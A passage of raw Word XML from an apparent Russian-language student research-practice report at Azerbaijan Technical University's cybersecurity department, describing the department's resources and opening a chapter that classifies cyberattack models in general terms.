        <w:spacing w:line="360" w:lineRule="auto"/>
        <w:ind w:firstLine="284"/>
        <w:jc w:val="both"/>
        <w:rPr>
          <w:lang w:val="af-ZA" w:eastAsia="ru-RU"/>
        </w:rPr>
      </w:pPr>
    </w:p>
    <w:p w14:paraId="0FBE1933" w14:textId="519D28E8" w:rsidR="003E29CA" w:rsidRPr="00D84C57" w:rsidRDefault="003E29CA" w:rsidP="00520A08">
      <w:pPr>
        <w:spacing w:line="360" w:lineRule="auto"/>
        <w:ind w:firstLine="284"/>
        <w:jc w:val="center"/>
        <w:rPr>
          <w:b/>
          <w:bCs/>
          <w:sz w:val="28"/>
          <w:szCs w:val="32"/>
          <w:lang w:val="af-ZA" w:eastAsia="ru-RU"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="00D84C57">
        <w:rPr>
          <w:b/>
          <w:bCs/>
          <w:sz w:val="28"/>
          <w:szCs w:val="32"/>
          <w:lang w:val="af-ZA" w:eastAsia="ru-RU"/>
        </w:rPr>
        <w:t>1.3 Азербайджанский Технический Университет: Инфраструктура, Исследовательские Проблемы, Объекты и Инструменты</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="00A9FA55" w14:textId="3FCD4CFB" w:rsidR="003E29CA" w:rsidRPr="003E29CA" w:rsidRDefault="003E29CA" w:rsidP="00520A08">
      <w:pPr>
        <w:spacing w:line="360" w:lineRule="auto"/>
        <w:ind w:firstLine="284"/>
        <w:jc w:val="both"/>
        <w:rPr>
          <w:rFonts w:asciiTheme="minorHAnsi" w:hAnsiTheme="minorHAnsi"/>
          <w:lang w:val="az-Latn-AZ" w:eastAsia="ru-RU"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="003E29CA">
        <w:rPr>
          <w:lang w:val="af-ZA" w:eastAsia="ru-RU"/>
        </w:rPr>
        <w:t>Азербайджанский Технический Университет (АзТУ) — ведущий исследовательский и образовательный центр, играющий ключевую роль в подготовке специалистов в области информационных технологий и кибербезопасности. Университет активно развивает исследования в области защиты данных и критической инфраструктуры. Инфраструктура Университета АзТУ оснащен современными лабораториями, вычислительными системами и платформами для разработки решений в области кибербезопасности. Это обеспечивает проведение сложных исследований и экспериментов в реальном времени. Исследовательские Проблемы</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:lang w:val="af-ZA" w:eastAsia="ru-RU"/>
        </w:rPr>
        <w:t>:</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="4192CC83" w14:textId="77777777" w:rsidR="003E29CA" w:rsidRDefault="003E29CA" w:rsidP="00520A08">
      <w:pPr>
        <w:spacing w:line="360" w:lineRule="auto"/>
        <w:ind w:firstLine="284"/>
        <w:jc w:val="both"/>
        <w:rPr>
          <w:lang w:val="af-ZA" w:eastAsia="ru-RU"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="003E29CA">
        <w:rPr>
          <w:lang w:val="af-ZA" w:eastAsia="ru-RU"/>
        </w:rPr>
        <w:t xml:space="preserve">Основная проблема — разработка новых методов защиты информационных систем и критической инфраструктуры. Исследования охватывают сетевые угрозы, киберпреступность и защиту данных в облачных вычислениях. </w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="78490C7E" w14:textId="77777777" w:rsidR="003E29CA" w:rsidRDefault="003E29CA" w:rsidP="00520A08">
      <w:pPr>
        <w:spacing w:line="360" w:lineRule="auto"/>
        <w:ind w:firstLine="284"/>
        <w:jc w:val="both"/>
        <w:rPr>
          <w:lang w:val="af-ZA" w:eastAsia="ru-RU"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="003E29CA">
        <w:rPr>
          <w:lang w:val="af-ZA" w:eastAsia="ru-RU"/>
        </w:rPr>
        <w:lastRenderedPageBreak/>
        <w:t>Объекты и Инструменты Исследования</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:lang w:val="af-ZA" w:eastAsia="ru-RU"/>
        </w:rPr>
        <w:t>:</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="7B4E9101" w14:textId="145C9F05" w:rsidR="003E29CA" w:rsidRDefault="003E29CA" w:rsidP="00520A08">
      <w:pPr>
        <w:spacing w:line="360" w:lineRule="auto"/>
        <w:ind w:firstLine="284"/>
        <w:jc w:val="both"/>
        <w:rPr>
          <w:lang w:eastAsia="ru-RU"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="003E29CA">
        <w:rPr>
          <w:lang w:val="af-ZA" w:eastAsia="ru-RU"/>
        </w:rPr>
        <w:t xml:space="preserve"> Объектами исследования являются информационные системы, сетевые инфраструктуры и искусственный интеллект для защиты данных. Используются современные программные средства для анализа угроз и защиты информации, а также международные стандарты. Роль АзТУ в Информационной Безопасности АзТУ активно развивает кибербезопасность в Азербайджане, обучая специалистов и разрабатывая инновационные методы защиты критической инфраструктуры и дан</w:t>
      </w:r>
      <w:r w:rsidR="0088092B">
        <w:rPr>
          <w:lang w:eastAsia="ru-RU"/>
        </w:rPr>
        <w:t>ных</w:t>
      </w:r>
      <w:r w:rsidR="008E31D6">
        <w:rPr>
          <w:lang w:eastAsia="ru-RU"/>
        </w:rPr>
        <w:t>.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="404D380E" w14:textId="77777777" w:rsidR="00E7264E" w:rsidRDefault="00E7264E" w:rsidP="00520A08">
      <w:pPr>
        <w:spacing w:line="360" w:lineRule="auto"/>
        <w:ind w:firstLine="284"/>
        <w:jc w:val="both"/>
        <w:rPr>
          <w:lang w:eastAsia="ru-RU"/>
        </w:rPr>
      </w:pPr>
    </w:p>
    <w:p w14:paraId="746E0FBF" w14:textId="4FA2F94F" w:rsidR="00D84C57" w:rsidRPr="00D84C57" w:rsidRDefault="00D84C57" w:rsidP="00520A08">
      <w:pPr>
        <w:spacing w:line="360" w:lineRule="auto"/>
        <w:ind w:firstLine="284"/>
        <w:jc w:val="center"/>
        <w:rPr>
          <w:b/>
          <w:bCs/>
          <w:sz w:val="28"/>
          <w:szCs w:val="32"/>
          <w:lang w:eastAsia="ru-RU"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="00D84C57">
        <w:rPr>
          <w:b/>
          <w:bCs/>
          <w:sz w:val="28"/>
          <w:szCs w:val="32"/>
          <w:lang w:eastAsia="ru-RU"/>
        </w:rPr>
        <w:t>1.4 Сущность, содержание и цели научно-исследовательской практики</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="3C62F80C" w14:textId="77777777" w:rsidR="00D84C57" w:rsidRDefault="00D84C57" w:rsidP="00520A08">
      <w:pPr>
        <w:spacing w:line="360" w:lineRule="auto"/>
        <w:ind w:firstLine="284"/>
        <w:jc w:val="both"/>
        <w:rPr>
          <w:lang w:eastAsia="ru-RU"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="00D84C57">
        <w:rPr>
          <w:lang w:eastAsia="ru-RU"/>
        </w:rPr>
        <w:t xml:space="preserve">В данном подразделе рассмотрены сущность, содержание и цели научно-исследовательской практики. </w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="2ADA5CE5" w14:textId="77777777" w:rsidR="00D84C57" w:rsidRDefault="00D84C57" w:rsidP="00520A08">
      <w:pPr>
        <w:spacing w:line="360" w:lineRule="auto"/>
        <w:ind w:firstLine="284"/>
        <w:jc w:val="both"/>
        <w:rPr>
          <w:lang w:eastAsia="ru-RU"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="00D84C57">
        <w:rPr>
          <w:lang w:eastAsia="ru-RU"/>
        </w:rPr>
        <w:t xml:space="preserve">Сущность научно-исследовательской практики: Научно-исследовательская практика — это сложный и многогранный процесс, который включает поиск новых знаний, расширение существующей базы знаний и решение проблем с помощью научных методов. Эта практика охватывает различные исследования и эксперименты в разных научных областях и позволяет формировать новые гипотезы, проверять теории и внедрять инновационные решения. </w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="763C75C3" w14:textId="77777777" w:rsidR="00D84C57" w:rsidRDefault="00D84C57" w:rsidP="00520A08">
      <w:pPr>
        <w:spacing w:line="360" w:lineRule="auto"/>
        <w:ind w:firstLine="284"/>
        <w:jc w:val="both"/>
        <w:rPr>
          <w:lang w:eastAsia="ru-RU"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="00D84C57">
        <w:rPr>
          <w:lang w:eastAsia="ru-RU"/>
        </w:rPr>
        <w:t xml:space="preserve">Содержание научно-исследовательской практики: </w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="1D661C7A" w14:textId="77777777" w:rsidR="00D84C57" w:rsidRDefault="00D84C57" w:rsidP="00520A08">
      <w:pPr>
        <w:spacing w:line="360" w:lineRule="auto"/>
        <w:ind w:firstLine="284"/>
        <w:jc w:val="both"/>
        <w:rPr>
          <w:lang w:eastAsia="ru-RU"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="00D84C57">
        <w:rPr>
          <w:lang w:eastAsia="ru-RU"/>
        </w:rPr>
        <w:t xml:space="preserve">Содержание научно-исследовательской практики охватывает широкий спектр, от фундаментальных исследований до прикладных. Это включает в себя разработку новых технологий, решение важных социальных проблем и внедрение инновационных подходов в различных областях. В содержание практики также входят методология, исследовательские методы, аналитические инструменты и анализ полученных результатов. </w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="3BA8E154" w14:textId="58D924D0" w:rsidR="00D84C57" w:rsidRDefault="00D84C57" w:rsidP="00520A08">
      <w:pPr>
        <w:spacing w:line="360" w:lineRule="auto"/>
        <w:ind w:firstLine="284"/>
        <w:jc w:val="both"/>
        <w:rPr>
          <w:lang w:eastAsia="ru-RU"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="00D84C57">
        <w:rPr>
          <w:lang w:eastAsia="ru-RU"/>
        </w:rPr>
        <w:t xml:space="preserve">Цели научно-исследовательской практики: </w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="3554E781" w14:textId="5A04F8E5" w:rsidR="00D84C57" w:rsidRDefault="00D84C57" w:rsidP="00520A08">
      <w:pPr>
        <w:spacing w:line="360" w:lineRule="auto"/>
        <w:ind w:firstLine="284"/>
        <w:jc w:val="both"/>
        <w:rPr>
          <w:lang w:eastAsia="ru-RU"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="00D84C57">
        <w:rPr>
          <w:lang w:eastAsia="ru-RU"/>
        </w:rPr>
        <w:t>Основная цель научно-исследовательской практики — обеспечить постоянное развитие общества и науки. Это достигается через научные открытия, технологические достижения и проведение исследований, направленных на решение социальных и экономических проблем. Кроме того, цель практики — подготовка новых поколений ученых, распространение научных знаний и поддержка принятия решений, основанных на научных данных. В результате, научно-исследовательская практика представляет собой целенаправленную и систематическую деятельность, способствующую развитию как общества, так и науки.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="0BCD594A" w14:textId="77777777" w:rsidR="008E31D6" w:rsidRDefault="008E31D6" w:rsidP="00520A08">
      <w:pPr>
        <w:spacing w:line="360" w:lineRule="auto"/>
        <w:ind w:firstLine="284"/>
        <w:jc w:val="both"/>
        <w:rPr>
          <w:lang w:eastAsia="ru-RU"/>
        </w:rPr>
      </w:pPr>
    </w:p>
    <w:p w14:paraId="3F23EFAF" w14:textId="1A88E213" w:rsidR="008E31D6" w:rsidRPr="00E7264E" w:rsidRDefault="008E31D6" w:rsidP="00520A08">
      <w:pPr>
        <w:pStyle w:val="3"/>
        <w:spacing w:before="0" w:after="0" w:line="360" w:lineRule="auto"/>
        <w:jc w:val="center"/>
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
          <w:b/>
          <w:bCs/>
          <w:sz w:val="28"/>
          <w:szCs w:val="28"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="008E31D6">
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
          <w:b/>
          <w:bCs/>
          <w:sz w:val="28"/>
          <w:szCs w:val="28"/>
        </w:rPr>
        <w:lastRenderedPageBreak/>
        <w:t>1.5 Анализ существующих возможностей во время научно-исследовательской практики в кафедре кибербезопасности</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="217CD786" w14:textId="77777777" w:rsidR="008E31D6" w:rsidRPr="008E31D6" w:rsidRDefault="008E31D6" w:rsidP="00520A08">
      <w:pPr>
        <w:pStyle w:val="afd"/>
        <w:spacing w:before="0" w:beforeAutospacing="0" w:after="0" w:afterAutospacing="0" w:line="360" w:lineRule="auto"/>
        <w:ind w:firstLine="284"/>
        <w:jc w:val="both"/>
        <w:rPr>
          <w:lang w:val="ru-RU"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="008E31D6">
        <w:rPr>
          <w:lang w:val="ru-RU"/>
        </w:rPr>
        <w:t>Кафедра кибербезопасности Азербайджанского Технического Университета (АзТУ) является одним из ведущих исследовательских центров страны в области информационной безопасности. В ходе научно-исследовательской практики на кафедре, анализ существующих возможностей является важным для повышения научно-технического потенциала и эффективности проводимых исследований.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="7A4BF89E" w14:textId="77777777" w:rsidR="008E31D6" w:rsidRDefault="008E31D6" w:rsidP="00520A08">
      <w:pPr>
        <w:pStyle w:val="afd"/>
        <w:spacing w:before="0" w:beforeAutospacing="0" w:after="0" w:afterAutospacing="0" w:line="360" w:lineRule="auto"/>
        <w:ind w:firstLine="284"/>
        <w:jc w:val="both"/>
        <w:rPr>
          <w:lang w:val="ru-RU"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="008E31D6">
        <w:rPr>
          <w:rStyle w:val="afe"/>
          <w:b w:val="0"/>
          <w:bCs w:val="0"/>
          <w:lang w:val="ru-RU"/>
        </w:rPr>
        <w:t>Техническая и технологическая инфраструктура:</w:t>
      </w:r>
      <w:r w:rsidRPr="008E31D6">
        <w:rPr>
          <w:lang w:val="ru-RU"/>
        </w:rPr>
        <w:t xml:space="preserve"> Кафедра обладает современным техническим оснащением, что позволяет проводить комплексные исследования в области кибербезопасности. Высокопроизводительные вычислительные системы, серверные комнаты и лаборатории обеспечивают необходимые условия для работы с большими объемами данных, искусственным интеллектом и машинным обучением. Кафедра также имеет связь с международными научными сетями, что облегчает сотрудничество с учеными со всего мира.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="43174488" w14:textId="77777777" w:rsidR="008E31D6" w:rsidRDefault="008E31D6" w:rsidP="00520A08">
      <w:pPr>
        <w:pStyle w:val="afd"/>
        <w:spacing w:before="0" w:beforeAutospacing="0" w:after="0" w:afterAutospacing="0" w:line="360" w:lineRule="auto"/>
        <w:ind w:firstLine="284"/>
        <w:jc w:val="both"/>
        <w:rPr>
          <w:lang w:val="ru-RU"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="008E31D6">
        <w:rPr>
          <w:rStyle w:val="afe"/>
          <w:b w:val="0"/>
          <w:bCs w:val="0"/>
          <w:lang w:val="ru-RU"/>
        </w:rPr>
        <w:t>Человеческие ресурсы:</w:t>
      </w:r>
      <w:r w:rsidRPr="008E31D6">
        <w:rPr>
          <w:lang w:val="ru-RU"/>
        </w:rPr>
        <w:t xml:space="preserve"> Одним из главных преимуществ кафедры является её профессиональный и опытный научный коллектив. Преподаватели и исследователи кафедры обладают высокой квалификацией в различных областях информационной безопасности и могут применять новые подходы в научных исследованиях, что способствует повышению качества и эффективности работы.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="17B0ECCD" w14:textId="77777777" w:rsidR="008E31D6" w:rsidRDefault="008E31D6" w:rsidP="00520A08">
      <w:pPr>
        <w:pStyle w:val="afd"/>
        <w:spacing w:before="0" w:beforeAutospacing="0" w:after="0" w:afterAutospacing="0" w:line="360" w:lineRule="auto"/>
        <w:ind w:firstLine="284"/>
        <w:jc w:val="both"/>
        <w:rPr>
          <w:lang w:val="ru-RU"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="008E31D6">
        <w:rPr>
          <w:rStyle w:val="afe"/>
          <w:b w:val="0"/>
          <w:bCs w:val="0"/>
          <w:lang w:val="ru-RU"/>
        </w:rPr>
        <w:t>Возможности для исследований и разработки:</w:t>
      </w:r>
      <w:r w:rsidRPr="008E31D6">
        <w:rPr>
          <w:lang w:val="ru-RU"/>
        </w:rPr>
        <w:t xml:space="preserve"> Кафедра предоставляет широкие возможности для фундаментальных и прикладных исследований в области кибербезопасности. В частности, исследования охватывают такие актуальные темы, как защита данных, безопасность сетевых инфраструктур, облачные вычисления, искусственный интеллект и разработка новых веб-технологий. Это создает благоприятные условия для инноваций и продвижения научных достижений.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="499F142D" w14:textId="75FB67C4" w:rsidR="008E31D6" w:rsidRPr="008E31D6" w:rsidRDefault="008E31D6" w:rsidP="00520A08">
      <w:pPr>
        <w:pStyle w:val="afd"/>
        <w:spacing w:before="0" w:beforeAutospacing="0" w:after="0" w:afterAutospacing="0" w:line="360" w:lineRule="auto"/>
        <w:ind w:firstLine="284"/>
        <w:jc w:val="both"/>
        <w:rPr>
          <w:lang w:val="ru-RU"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="008E31D6">
        <w:rPr>
          <w:rStyle w:val="afe"/>
          <w:b w:val="0"/>
          <w:bCs w:val="0"/>
          <w:lang w:val="ru-RU"/>
        </w:rPr>
        <w:t>Международное сотрудничество и проекты:</w:t>
      </w:r>
      <w:r w:rsidRPr="008E31D6">
        <w:rPr>
          <w:lang w:val="ru-RU"/>
        </w:rPr>
        <w:t xml:space="preserve"> Кафедра активно сотрудничает с международными научными учреждениями и участвует в многочисленных международных исследованиях и проектах. Это сотрудничество способствует признанию научных результатов кафедры на мировом уровне и их распространению за рубежом.</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:lang w:val="ru-RU"/>
        </w:rPr>
        <w:t xml:space="preserve"> </w:t>
      </w:r>
      <w:r w:rsidRPr="008E31D6">
        <w:rPr>
          <w:lang w:val="ru-RU"/>
        </w:rPr>
        <w:t>Таким образом, наличие мощной технической инфраструктуры, квалифицированных специалистов, возможности для проведения исследований и активное международное сотрудничество играют ключевую роль в успешной научно-исследовательской деятельности кафедры кибербезопасности АзТУ. Это также способствует укреплению позиции Азербайджана в области информационной безопасности.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="178A3D83" w14:textId="77777777" w:rsidR="00232EB6" w:rsidRDefault="00232EB6" w:rsidP="00520A08">
      <w:pPr>
        <w:spacing w:after="160" w:line="360" w:lineRule="auto"/>
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:eastAsia="Times New Roman" w:hAnsi="Times New Roman"/>
          <w:lang w:eastAsia="ru-RU"/>
        </w:rPr>
      </w:pPr>
      <w:bookmarkStart w:id="4" w:name="_Toc161761588"/>
    </w:p>
    <w:p w14:paraId="1D5B29C8" w14:textId="56E6B736" w:rsidR="00337E66" w:rsidRDefault="004A47AB" w:rsidP="00520A08">
      <w:pPr>
        <w:spacing w:line="360" w:lineRule="auto"/>
        <w:jc w:val="center"/>
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman"/>
          <w:b/>
          <w:bCs/>
          <w:sz w:val="28"/>
          <w:szCs w:val="28"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="004A47AB">
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman"/>
          <w:b/>
          <w:bCs/>
          <w:sz w:val="28"/>
          <w:szCs w:val="28"/>
        </w:rPr>
        <w:lastRenderedPageBreak/>
        <w:t>ГЛАВА II. МОДЕЛИ КИБЕРАТАК И ИХ КЛАССИФИКАЦИЯ</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="6C0F8029" w14:textId="77777777" w:rsidR="00E7264E" w:rsidRDefault="00E7264E" w:rsidP="00520A08">
      <w:pPr>
        <w:spacing w:line="360" w:lineRule="auto"/>
        <w:jc w:val="center"/>
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman"/>
          <w:b/>
          <w:bCs/>
          <w:sz w:val="28"/>
          <w:szCs w:val="28"/>
        </w:rPr>
      </w:pPr>
    </w:p>
    <w:p w14:paraId="26352009" w14:textId="5F1AB91B" w:rsidR="007E0BCF" w:rsidRPr="007E0BCF" w:rsidRDefault="004A47AB" w:rsidP="00520A08">
      <w:pPr>
        <w:spacing w:line="360" w:lineRule="auto"/>
        <w:jc w:val="center"/>
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman"/>
          <w:b/>
          <w:bCs/>
          <w:sz w:val="28"/>
          <w:szCs w:val="28"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="007E0BCF">
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman"/>
          <w:b/>
          <w:bCs/>
          <w:sz w:val="28"/>
          <w:szCs w:val="28"/>
        </w:rPr>
        <w:t>2.1. Что такое модели кибератак и как они помогают в защите?</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="2FE46E62" w14:textId="56AD17AF" w:rsidR="004A47AB" w:rsidRDefault="004A47AB" w:rsidP="00520A08">
      <w:pPr>
        <w:pStyle w:val="afd"/>
        <w:spacing w:before="0" w:beforeAutospacing="0" w:after="0" w:afterAutospacing="0" w:line="360" w:lineRule="auto"/>
        <w:ind w:firstLine="284"/>
        <w:jc w:val="both"/>
        <w:rPr>
          <w:lang w:val="ru-RU"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="004A47AB">
        <w:rPr>
          <w:lang w:val="ru-RU"/>
        </w:rPr>
        <w:t>Модели кибератак — это инструменты, которые помогают исследовать и прогнозировать действия злоумышленников в информационных системах. Они позволяют смоделировать возможные атаки, чтобы заранее выявить уязвимости и подготовить систему к защите. Эти модели часто применяются для создания сценариев атак, анализа их последствий и разработки более эффективных стратегий безопасности. Основная цель таких моделей — предсказать, как может происходить кибератака, и помочь разработать адекватные методы защиты.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="5AC5D214" w14:textId="687F4B86" w:rsidR="004A47AB" w:rsidRPr="008E40AC" w:rsidRDefault="004A47AB" w:rsidP="00520A08">
      <w:pPr>
        <w:pStyle w:val="afd"/>
        <w:spacing w:before="0" w:beforeAutospacing="0" w:after="0" w:afterAutospacing="0" w:line="360" w:lineRule="auto"/>
        <w:jc w:val="center"/>
        <w:rPr>
          <w:b/>
          <w:bCs/>
          <w:sz w:val="28"/>
          <w:szCs w:val="28"/>
          <w:lang w:val="ru-RU"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="008E40AC">
        <w:rPr>
          <w:b/>
          <w:bCs/>
          <w:sz w:val="28"/>
          <w:szCs w:val="28"/>
          <w:lang w:val="ru-RU"/>
        </w:rPr>
        <w:t>2.2. Классификация моделей атак</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="27861402" w14:textId="77777777" w:rsidR="00C079FC" w:rsidRDefault="004A47AB" w:rsidP="00520A08">
      <w:pPr>
        <w:pStyle w:val="afd"/>
        <w:spacing w:before="0" w:beforeAutospacing="0" w:after="0" w:afterAutospacing="0" w:line="360" w:lineRule="auto"/>
        <w:ind w:firstLine="284"/>
        <w:jc w:val="both"/>
        <w:rPr>
          <w:lang w:val="ru-RU"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="004A47AB">
        <w:rPr>
          <w:lang w:val="ru-RU"/>
        </w:rPr>
        <w:t xml:space="preserve">Модели атак можно классифицировать на несколько типов, среди которых выделяют теоретические, эмпирические и симуляционные. </w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="51D3C2A7" w14:textId="77777777" w:rsidR="00C079FC" w:rsidRDefault="004A47AB" w:rsidP="00520A08">
      <w:pPr>
        <w:pStyle w:val="afd"/>
        <w:spacing w:before="0" w:beforeAutospacing="0" w:after="0" w:afterAutospacing="0" w:line="360" w:lineRule="auto"/>
        <w:ind w:firstLine="284"/>
        <w:jc w:val="both"/>
        <w:rPr>
          <w:lang w:val="ru-RU"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="004A47AB">
        <w:rPr>
          <w:lang w:val="ru-RU"/>
        </w:rPr>
        <w:t xml:space="preserve">Теоретические модели основаны на математическом анализе и логике, они помогают предсказать возможные уязвимости системы на основе теоретических знаний. </w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="69C86898" w14:textId="77777777" w:rsidR="00C079FC" w:rsidRDefault="004A47AB" w:rsidP="00520A08">
      <w:pPr>
        <w:pStyle w:val="afd"/>
        <w:spacing w:before="0" w:beforeAutospacing="0" w:after="0" w:afterAutospacing="0" w:line="360" w:lineRule="auto"/>
        <w:ind w:firstLine="284"/>
        <w:jc w:val="both"/>
        <w:rPr>
          <w:lang w:val="ru-RU"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="004A47AB">
        <w:rPr>
          <w:lang w:val="ru-RU"/>
        </w:rPr>
        <w:t xml:space="preserve">Эмпирические модели основываются на реальных инцидентах, анализе кибератак, что делает их более практичными и актуальными. </w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="7D31904B" w14:textId="06D92EB4" w:rsidR="00C079FC" w:rsidRDefault="004A47AB" w:rsidP="00520A08">
      <w:pPr>
        <w:pStyle w:val="afd"/>
        <w:spacing w:before="0" w:beforeAutospacing="0" w:after="0" w:afterAutospacing="0" w:line="360" w:lineRule="auto"/>
        <w:ind w:firstLine="284"/>
        <w:jc w:val="both"/>
        <w:rPr>
          <w:lang w:val="ru-RU"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="004A47AB">
        <w:rPr>
          <w:lang w:val="ru-RU"/>
        </w:rPr>
        <w:t>Симуляционные модели — это тесты, которые моделируют реальные атаки в контролируемой среде и позволяют оценить готовность системы к защите.</w:t>
      </w:r>
      <w:r w:rsidR="00520A08" w:rsidRPr="00520A08">
        <w:rPr>
          <w:noProof/>
          <w:lang w:val="ru-RU"/>
        </w:rPr>
        <w:t xml:space="preserve"> </w:t>
      </w:r>
      <w:r w:rsidR="00520A08">
        <w:rPr>
          <w:noProof/>
        </w:rPr>
        <w:drawing>
          <wp:inline distT="0" distB="0" distL="0" distR="0" wp14:anchorId="2A93179D" wp14:editId="465EB9CD">
            <wp:extent cx="5765533" cy="3476730"/>
            <wp:effectExtent l="0" t="0" r="698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6136" t="23099" r="9246" b="7604"/>
                    <a:stretch/>
                  </pic:blipFill>
                  <pic:spPr bwMode="auto">
                    <a:xfrm>
                      <a:off x="0" y="0"/>
                      <a:ext cx="5767968" cy="3478198"/>
                    </a:xfrm>
                    <a:prstGeom prst="rect">
                      <a:avLst/>
                    </a:prstGeom>
                    <a:ln>
                      <a:noFill/>
                    </a:ln>
                    <a:extLst>
                      <a:ext uri="{53640926-AAD7-44D8-BBD7-CCE9431645EC}">
                        <a14:shadowObscured xmlns:a14="http://schemas.microsoft.com/office/drawing/2010/main"/>
                      </a:ext>
                    </a:extLst>
                  </pic:spPr>
                </pic:pic>
              </a:graphicData>
            </a:graphic>
          </wp:inline>
        </w:drawing>
      </w:r>
    </w:p>
    <w:p w14:paraId="507E2F2B" w14:textId="2FF57083" w:rsidR="00C079FC" w:rsidRDefault="004241E8" w:rsidP="00520A08">
      <w:pPr>
        <w:spacing w:line="360" w:lineRule="auto"/>
        <w:ind w:firstLine="708"/>
        <w:jc w:val="center"/>
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:eastAsia="Times New Roman" w:hAnsi="Times New Roman"/>
          <w:lang w:eastAsia="ru-RU"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="005412C6">
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:eastAsia="Times New Roman" w:hAnsi="Times New Roman"/>
          <w:lang w:eastAsia="ru-RU"/>
        </w:rPr>
        <w:t xml:space="preserve">Рис. </w:t>
      </w:r>
      <w:r w:rsidR="0046024C" w:rsidRPr="008E40AC">
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:eastAsia="Times New Roman" w:hAnsi="Times New Roman"/>
          <w:lang w:eastAsia="ru-RU"/>
        </w:rPr>
        <w:t>1</w:t>
      </w:r>
      <w:r w:rsidR="000262BB">
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:eastAsia="Times New Roman" w:hAnsi="Times New Roman"/>
          <w:lang w:eastAsia="ru-RU"/>
        </w:rPr>
        <w:t xml:space="preserve"> -</w:t>
      </w:r>
      <w:r w:rsidRPr="005412C6">
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:eastAsia="Times New Roman" w:hAnsi="Times New Roman"/>
          <w:lang w:eastAsia="ru-RU"/>
        </w:rPr>
        <w:t xml:space="preserve"> Фрагмент обобщенной модели атак</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="64A9B33C" w14:textId="77777777" w:rsidR="00520A08" w:rsidRPr="00520A08" w:rsidRDefault="00520A08" w:rsidP="00520A08">
      <w:pPr>
        <w:spacing w:line="360" w:lineRule="auto"/>
        <w:ind w:firstLine="708"/>
        <w:jc w:val="center"/>
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:eastAsia="Times New Roman" w:hAnsi="Times New Roman"/>
          <w:lang w:eastAsia="ru-RU"/>
        </w:rPr>
      </w:pPr>
    </w:p>
    <w:p w14:paraId="1BA2D8BD" w14:textId="67DAD083" w:rsidR="004A47AB" w:rsidRPr="007E0BCF" w:rsidRDefault="004A47AB" w:rsidP="00520A08">
      <w:pPr>
        <w:pStyle w:val="afd"/>
